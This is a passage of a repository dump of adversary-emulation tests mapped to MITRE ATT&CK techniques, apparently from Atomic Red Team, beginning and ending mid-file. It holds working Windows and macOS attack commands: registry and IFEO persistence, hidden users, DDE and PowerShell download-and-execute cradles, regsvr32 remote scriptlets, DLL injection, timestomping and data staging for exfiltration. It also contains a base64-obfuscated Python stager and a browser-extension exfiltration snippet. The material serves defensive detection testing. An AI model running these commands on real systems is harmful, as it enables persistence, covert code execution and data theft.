25 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
26 |
27 | - name: IFEO GLobal Flags
28 | description: |
29 | Leverage Global Flags Settings
30 |
31 | supported_platforms:
32 | - windows
33 |
34 | input_arguments:
35 | target_binary:
36 | description: Binary To Attach To
37 | type: Path
38 | default: notepad.exe
39 | payload_binary:
40 | description: Binary To Execute
41 | type: Path
42 | default: cmd.exe
43 |
44 | executor:
45 | name: command_prompt
46 | command: |
47 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
48 |
--------------------------------------------------------------------------------
/tests/T1127/src/T1127.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
13 |
14 |
15 |
16 |
17 |
20 |
21 |
22 |
23 |
27 |
28 |
29 |
30 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/tests/T1033/T1033.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1033
3 | display_name: System Owner/User Discovery
4 | tactic: Discovery
5 | description: Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.
6 |
7 | atomic_tests:
8 | - name: Enumerate system owner/user
9 | description: |
10 | Identify System owner or users on an endpoint
11 |
12 | supported_platforms:
13 | - windows
14 | - linux
15 | - macos
16 |
17 | executor_cmd:
18 | name: command_prompt
19 | command: |
20 | cmd.exe /C whoami
21 | wmic useraccount get #{/ALL}
22 | quser /SERVER:"#{computer_name}"
23 | quser
24 | qwinsta.exe" /server:#{computer_name}
25 | qwinsta.exe
26 | for #{/F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt}
27 | @FOR #{/F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt}
28 |
29 | executor_nix:
30 | name: sh
31 | command: |
32 | users
33 | w
34 | who
35 |
--------------------------------------------------------------------------------
/tests/T1147/T1147.md:
--------------------------------------------------------------------------------
1 | # T1147 - Hidden Users
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1147)
3 | Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. By using the Create Account technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: sudo dscl . -create /Users/username UniqueID 401 (Citation: Cybereason OSX Pirrit).
4 |
5 | Detection: This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.
6 |
7 | Platforms: macOS
8 |
9 | Data Sources: Authentication logs, File monitoring
10 |
11 | Permissions Required: Administrator, root
12 |
13 | ## Atomic Tests
14 |
15 | - [Atomic Test #1 - Hidden Users](#atomic-test-1---hidden-users)
16 |
17 |
18 |
19 |
20 | ## Atomic Test #1 - Hidden Users
21 | Add a hidden user on MacOS
22 |
23 | **Supported Platforms:** macOS
24 |
25 |
26 | #### Inputs
27 | | Name | Description | Type | Default Value |
28 | |------|-------------|------|---------------|
29 | | user_name | username to add | string | APT|
30 |
31 | #### Run it with `sh`!
32 | ```
33 | sudo dscl . -create /Users/#{user_name} UniqueID 333
34 | ```
35 |
36 |
--------------------------------------------------------------------------------
/tests/T1163/T1163.md:
--------------------------------------------------------------------------------
1 | # T1163 - Rc.common
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1163)
3 | During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.
4 |
5 | Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).
6 |
7 | Detection: The /etc/rc.common file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.
8 |
9 | Platforms: macOS
10 |
11 | Data Sources: File monitoring, Process Monitoring
12 |
13 | Permissions Required: root
14 |
15 | ## Atomic Tests
16 |
17 | - [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)
18 |
19 |
20 |
21 |
22 | ## Atomic Test #1 - rc.common
23 | Modify rc.common
24 |
25 | [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
26 |
27 | **Supported Platforms:** macOS
28 |
29 |
30 | #### Run it with `sh`!
31 | ```
32 | echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
33 | ```
34 |
35 |
--------------------------------------------------------------------------------
/tests/T1137/T1137.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1137
3 | display_name: Office Application Startup
4 | tactic: Persistence
5 | description: Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.
6 |
7 | atomic_tests:
8 | - name: DDEAUTO
9 | description: |
10 | TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
11 | SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
12 | Word VBA Macro
13 | [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
14 |
15 | supported_platforms:
16 | - windows
17 |
18 | executor_man:
19 | name: manual
20 | steps: |
21 | 1. Open Word
22 | 2. Insert tab -> Quick Parts -> Field
23 | 3. Choose = (Formula) and click ok.
24 | 4. Once the field is inserted, you should now see "!Unexpected End of Formula"
25 | 5. Right-click the Field, choose "Toggle Field Codes"
26 | 6. Paste in the code from Unicorn or SensePost
27 | 7. Save the Word document.
28 | 9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
29 | 10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http:///download.ps1'); # " "Microsoft Document Security Add-On"
--------------------------------------------------------------------------------
/tests/T1060/T1060.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1060
3 | display_name: Registry Run Keys and Start Folder
4 | tactic: Persistence
5 | description: Adding an entry to "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level. **Requires admin**
6 |
7 | atomic_tests:
8 | - name: Reg Key Run
9 | description: |
10 | Run/RunOnce Key Persistence
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | input_arguments:
16 | command_to_execute:
17 | description: Thing to Run
18 | type: Path
19 | default: \HelloWorld.bat
20 |
21 | executor_cmd:
22 | name: command_prompt
23 | command: |
24 | REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "\mate\tests\t1060\HelloWorld.bat"
25 | REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
26 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /V 1 /d "\mate\tests\t1060\HelloWorld.bat" /f
27 | REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /V 1 /f
28 |
29 | executor_pwr:
30 | name: powershell
31 | command: |
32 | Set-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name "NextRun" -Value "\mate\tests\t1060\HelloWorld.bat" -Force
33 | Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name "NextRun" -Force
34 | "\mate\tests\t1060\t1060.ps1"
--------------------------------------------------------------------------------
/tests/T1176/inline.js:
--------------------------------------------------------------------------------
1 | function exfil(str) {
2 | // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
3 | // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
4 | // and probably a thousand other methods. But this one is easy.
5 | var buffer = new TextEncoder("utf-8").encode(str);
6 | return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
7 | }
8 |
9 | function callUrl(buffer) {
10 | // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
11 | // except it's example.com so w/e
12 | var digest = hex(buffer);
13 | var url = "https://example.com/" + digest;
14 | console.log("Exfiltrating data to " + url)
15 | var xmlHttp = new XMLHttpRequest();
16 | xmlHttp.open( "GET", url, true);
17 | xmlHttp.send( null);
18 | return digest;
19 | }
20 |
21 | function hex(buffer) {
22 | // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
23 | var hexCodes = [];
24 | var view = new DataView(buffer);
25 | for (var i = 0; i < view.byteLength; i += 4) {
26 | var value = view.getUint32(i)
27 | var stringValue = value.toString(16)
28 | var padding = '00000000'
29 | var paddedValue = (padding + stringValue).slice(-padding.length)
30 | hexCodes.push(paddedValue);
31 | }
32 | var athing = hexCodes.join("");
33 | return hexCodes.join("");
34 | }
35 |
36 | // Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
37 | var digest = exfil(document.title);
--------------------------------------------------------------------------------
/tests/T1099/T1099.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1099
3 | display_name: Timestomp
4 |
5 | atomic_tests:
6 | - name: Set a file's access timestamp
7 | description: |
8 | Stomps on the access timestamp of a file
9 | supported_platforms:
10 | - linux
11 | - macos
12 | input_arguments:
13 | target_filename:
14 | description: Path of file that we are going to stomp on last access time
15 | type: Path
16 | executor:
17 | name: sh
18 | command: |
19 | touch -a -t 197001010000.00 #{target_filename}
20 |
21 | - name: Set a file's modification timestamp
22 | description: |
23 | Stomps on the modification timestamp of a file
24 | supported_platforms:
25 | - linux
26 | - macos
27 | input_arguments:
28 | target_filename:
29 | description: Path of file that we are going to stomp on last access time
30 | type: Path
31 | executor:
32 | name: sh
33 | command: |
34 | touch -m -t 197001010000.00 #{target_filename}
35 |
36 | - name: Set a file's creation timestamp
37 | description: |
38 | Stomps on the create timestamp of a file
39 |
40 | Setting the creation timestamp requires changing the system clock and reverting.
41 | Sudo or root privileges are required to change date. Use with caution.
42 |
43 | supported_platforms:
44 | - linux
45 | - macos
46 | input_arguments:
47 | target_filename:
48 | description: Path of file that we are going to stomp on last access time
49 | type: Path
50 | executor:
51 | name: sh
52 | command: |
53 | NOW=$(date)
54 | date -s "1970-01-01 00:00:00"
55 | touch #{target_filename}
56 | date -s "$NOW"
57 | stat #{target_filename}
58 |
--------------------------------------------------------------------------------
/tests/T1117/T1117.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1117
3 | display_name: Regsvr32
4 | atomic_tests:
5 | - name: Regsvr32 local COM scriptlet execution
6 | description: |
7 | Regsvr32.exe is a command-line program used to register and unregister OLE controls
8 | supported_platforms:
9 | - windows
10 | input_arguments:
11 | filename:
12 | description: Name of the local file, include path.
13 | type: Path
14 | default: C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct
15 | executor:
16 | name: command_prompt
17 | command: |
18 | regsvr32.exe /s /u /i:#{filename} scrobj.dll
19 | - name: Regsvr32 remote COM scriptlet execution
20 | description: |
21 | Regsvr32.exe is a command-line program used to register and unregister OLE controls
22 | supported_platforms:
23 | - windows
24 | input_arguments:
25 | url:
26 | description: URL to hosted sct file
27 | type: Url
28 | default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct
29 | executor:
30 | name: command_prompt
31 | command: |
32 | regsvr32.exe /s /u /i:#{url} scrobj.dll
33 | - name: Regsvr32 local DLL execution
34 | description: |
35 | Regsvr32.exe is a command-line program used to register and unregister OLE controls
36 | supported_platforms:
37 | - windows
38 | input_arguments:
39 | dll_name:
40 | description: Name of DLL to Execute, DLL Should export DllRegisterServer
41 | type: Path
42 | default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
43 | executor:
44 | name: command_prompt
45 | command: |
46 | "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
47 |
--------------------------------------------------------------------------------
/tests/T1050/src/AtomicService.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Diagnostics;
6 | using System.ServiceProcess;
7 |
8 | // c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe AtomicService.cs
9 | // sc create AtomicService binPath= "C:\AtomicRedTeam\atomics\T10150\bin\AtomicService.exe"
10 | // sc start AtomicService
11 | // sc stop AtomicSerivce
12 | // sc delete AtomicSerivce
13 | // May require Administrator privileges
14 |
15 |
16 | namespace AtomicService
17 | {
18 | public class Service1 : System.ServiceProcess.ServiceBase
19 | {
20 |
21 | private System.ComponentModel.Container components = null;
22 |
23 | public Service1()
24 | {
25 |
26 | InitializeComponent();
27 |
28 | }
29 |
30 | // The main entry point for the process
31 | static void Main()
32 | {
33 | System.ServiceProcess.ServiceBase[] ServicesToRun;
34 |
35 | ServicesToRun = new System.ServiceProcess.ServiceBase[] { new AtomicService.Service1()};
36 |
37 | System.ServiceProcess.ServiceBase.Run(ServicesToRun);
38 | }
39 |
40 |
41 | private void InitializeComponent()
42 | {
43 | //
44 | // Service1
45 | //
46 | this.ServiceName = "AtomicService";
47 |
48 |
49 | }
50 |
51 | protected override void Dispose( bool disposing )
52 | {
53 | if( disposing )
54 | {
55 | if (components != null)
56 | {
57 | components.Dispose();
58 | }
59 | }
60 | base.Dispose( disposing );
61 | }
62 |
63 |
64 | protected override void OnStart(string[] args)
65 | {
66 |
67 | }
68 |
69 |
70 | protected override void OnStop()
71 | {
72 |
73 | }
74 | protected override void OnContinue()
75 | {
76 |
77 | }
78 | }
79 | }
80 |
--------------------------------------------------------------------------------
/tests/T1115/T1115.md:
--------------------------------------------------------------------------------
1 | # T1115 - Clipboard Data
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1115)
3 | Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.
4 |
5 | ===Windows===
6 |
7 | Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard)
8 |
9 | ===Mac===
10 |
11 | OSX provides a native command, pbpaste, to grab clipboard contents (Citation: Operating with EmPyre).
12 |
13 | Detection: Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.
14 |
15 | Platforms: Linux, macOS, Windows
16 |
17 | Data Sources: API monitoring
18 |
19 | ## Atomic Tests
20 |
21 | - [Atomic Test #1 - Utilize Clipboard to store or execute commands from](#atomic-test-1---utilize-clipboard-to-store-or-execute-commands-from)
22 |
23 | - [Atomic Test #2 - PowerShell](#atomic-test-2---powershell)
24 |
25 |
26 |
27 |
28 | ## Atomic Test #1 - Utilize Clipboard to store or execute commands from
29 | Add data to clipboard to copy off or execute commands from.
30 |
31 | **Supported Platforms:** Windows
32 |
33 |
34 | #### Run it with `command_prompt`!
35 | ```
36 | dir | clip
37 | clip < readme.txt
38 | ```
39 |
40 |
41 |
42 | ## Atomic Test #2 - PowerShell
43 | Utilize PowerShell to echo a command to clipboard and execute it
44 |
45 | **Supported Platforms:** Windows
46 |
47 |
48 | #### Run it with `powershell`!
49 | ```
50 | echo Get-Process | clip
51 | Get-Clipboard | iex
52 | ```
53 |
54 |
--------------------------------------------------------------------------------
/tests/T1155/T1155.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1155
3 | display_name: AppleScript
4 |
5 | atomic_tests:
6 | - name: AppleScript
7 | description: |
8 | Shell Script with AppleScript
9 |
10 | reference
11 |
12 | https://github.com/EmpireProject/Empire
13 |
14 | supported_platforms:
15 | - macos
16 |
17 | executor:
18 | name: sh
19 | command: |
20 | osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &""
21 |
--------------------------------------------------------------------------------
/tests/T1105/T1105.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1105
3 | display_name: Remote File Copy
4 |
5 | atomic_tests:
6 | - name: xxxx
7 | description: |
8 | xxxx
9 | supported_platforms:
10 | - linux
11 | - macos
12 | executor:
13 | name: bash
14 | command: |
15 | ### TODO: Not sure how to handle commands that need to be run on multiple systems
16 |
17 | # Adversary System Configuration
18 | # Ensure SSH access has been configured for an adversary account
19 | echo "This file transferred by scp" > /tmp/adversary-scp
20 | echo "This file transferred by sftp" > /tmp/adversary-sftp
21 | mkdir /tmp/adversary-rsync
22 | cd /tmp/adversary-rsync
23 | touch a b c d e f g
24 |
25 | # Victim System Configuration
26 | # Ensure SSH access has been configured for a victim account
27 | # Ensure write access for victim account to this directory
28 | mkdir /tmp/victim-files
29 | cd /tmp/victim-files
30 |
31 | # Push files to victim using rsync
32 | rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
33 |
34 | # Pull files from adversary using rsync
35 | rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
36 |
37 | # Push files to victim using scp
38 | scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
39 |
40 | # Pull file from adversary using scp
41 | scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
42 |
43 | # Push files to victim using sftp
44 | sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
45 |
46 | # Pull file from adversary using sftp
47 | sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
48 |
--------------------------------------------------------------------------------
/tests/T1074/T1074.md:
--------------------------------------------------------------------------------
1 | # T1074 - Data Staged
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1074)
3 | Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted.
4 |
5 | Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.
6 |
7 | Detection: Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files.
8 |
9 | Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.
10 |
11 | Platforms: Linux, macOS, Windows
12 |
13 | Data Sources: File monitoring, Process monitoring, Process command-line parameters
14 |
15 | ## Atomic Tests
16 |
17 | - [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
18 |
19 |
20 |
21 |
22 | ## Atomic Test #1 - Stage data from Discovery.bat
23 | Utilize powershell to download discovery.bat and save to a local file
24 |
25 | **Supported Platforms:** Windows
26 |
27 |
28 | #### Run it with `powershell`!
29 | ```
30 | "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
31 | ```
32 |
33 |
--------------------------------------------------------------------------------
/tests/T1202/T1202.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1202
3 | display_name: Indirect Command Execution
4 |
5 | atomic_tests:
6 | - name: Indirect Command Execution - pcalua.exe
7 | description: |
8 | The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface.
9 |
10 | [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128)
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | input_arguments:
16 | process:
17 | description: Process to execute
18 | type: string
19 | default: calc.exe
20 | payload_path:
21 | description: Path to payload
22 | type: path
23 | default: c:\temp\payload.dll
24 | payload_cpl_path:
25 | description: Path to payload
26 | type: path
27 | default: C:\Windows\system32\javacpl.cpl -c Java
28 |
29 | executor:
30 | name: command_prompt
31 | command: |
32 | pcalua.exe -a #{process}
33 | pcalua.exe -a #{payload_path}
34 | pcalua.exe -a #{payload_cpl_path}
35 |
36 | - name: Indirect Command Execution - forfiles.exe
37 | description: |
38 | forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface.
39 |
40 | [Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md)
41 |
42 | "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe"
43 |
44 | supported_platforms:
45 | - windows
46 |
47 | input_arguments:
48 | process:
49 | description: Process to execute
50 | type: string
51 | default: calc.exe
52 |
53 | executor:
54 | name: command_prompt
55 | command: |
56 | forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
57 | forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
58 |
--------------------------------------------------------------------------------
/tests/T1218/T1218.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1218
3 | display_name: Signed Binary Proxy Execution
4 |
5 | atomic_tests:
6 | - name: mavinject - Inject DLL into running process
7 | description: |
8 | Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | dll_payload:
15 | description: DLL to inject
16 | type: Path
17 | default: C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll
18 | process_id:
19 | description: PID of process receiving injection
20 | type: string
21 | default: 1000
22 | executor:
23 | name: command_prompt
24 | command: |
25 | mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
26 |
27 | - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
28 | description: |
29 | Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.
30 |
31 | supported_platforms:
32 | - windows
33 |
34 | input_arguments:
35 | powershell_code:
36 | description: PowerShell code to execute
37 | type: string
38 | default: Start-Process calc.exe
39 | executor:
40 | name: command_prompt
41 | command: |
42 | SyncAppvPublishingServer.exe "n; #{powershell_code}"
43 |
44 | - name: Register-CimProvider - Execute evil dll
45 | description: |
46 | Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB
47 |
48 | supported_platforms:
49 | - windows
50 |
51 | input_arguments:
52 | dll_payload:
53 | description: DLL to execute
54 | type: Path
55 | default: C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll
56 | executor:
57 | name: command_prompt
58 | command: |
59 | C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
--------------------------------------------------------------------------------
/tests/T1030/T1030.md:
--------------------------------------------------------------------------------
1 | # T1030 - Data Transfer Size Limits
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030)
3 | An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
4 |
5 | Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
6 |
7 | Platforms: Linux, macOS, Windows
8 |
9 | Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring
10 |
11 | Requires Network: Yes
12 |
13 | ## Atomic Tests
14 |
15 | - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits)
16 |
17 |
18 |
19 |
20 | ## Atomic Test #1 - Data Transfer Size Limits
21 | Take a file/directory, split it into 5Mb chunks
22 |
23 | **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
24 |
25 |
26 | #### Inputs
27 | | Name | Description | Type | Default Value |
28 | |------|-------------|------|---------------|
29 | | output_file | TODO | todo | TODO|
30 |
31 | #### Run it with `sh`!
32 | ```
33 | cd /tmp/
34 | dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
35 | split -b 5000000 /tmp/victim-whole-file
36 | ls -l
37 | ```
38 |
39 |
--------------------------------------------------------------------------------
/tests/T1002/T1002.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1002
3 | display_name: Data Compressed
4 |
5 | atomic_tests:
6 | - name: Compress Data for Exfiltration With PowerShell
7 | description: |
8 | TODO
9 | supported_platforms:
10 | - windows
11 | input_arguments:
12 | input_file:
13 | description: Path that should be compressed into our output file
14 | type: Path
15 | default: C:\*
16 | output_file:
17 | description: Path where resulting compressed data should be placed
18 | type: Path
19 | default: C:\test\Data.zip
20 | executor:
21 | name: powershell
22 | command: |
23 | dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
24 |
25 | - name: Compress Data for Exfiltration With Rar
26 | description: |
27 | TODO
28 | supported_platforms:
29 | - windows
30 | input_arguments:
31 | input_file:
32 | description: Path that should be compressed into our output file
33 | type: Path
34 | default: "*.docx"
35 | output_file:
36 | description: Path where resulting compressed data should be placed
37 | type: Path
38 | default: exfilthis.rar
39 | executor:
40 | name: command_prompt
41 | command: |
42 | rar a -r #{output_file} #{input_file}
43 |
44 | - name: Data Compressed - nix
45 | description: |
46 | TODO
47 | supported_platforms:
48 | - linux
49 | - macos
50 | executor:
51 | name: sh
52 | command: |
53 | mkdir /tmp/victim-files
54 | cd /tmp/victim-files
55 | touch a b c d e f g
56 | echo "This file will be gzipped" > /tmp/victim-gzip.txt
57 | echo "This file will be tarred" > /tmp/victim-tar.txt
58 | zip /tmp/victim-files.zip /tmp/victim-files/*
59 | gzip -f /tmp/victim-gzip.txt
60 | tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/
61 | tar -cvzf /tmp/victim-tar.tar.gz
62 |
--------------------------------------------------------------------------------
/tests/T1048/T1048.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1048
3 | display_name: Exfiltration Over Alternative Protocol
4 | tactic: Exfiltration
5 | description: Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.
6 |
7 | atomic_tests:
8 | - name: Exfiltration over alternative protocols
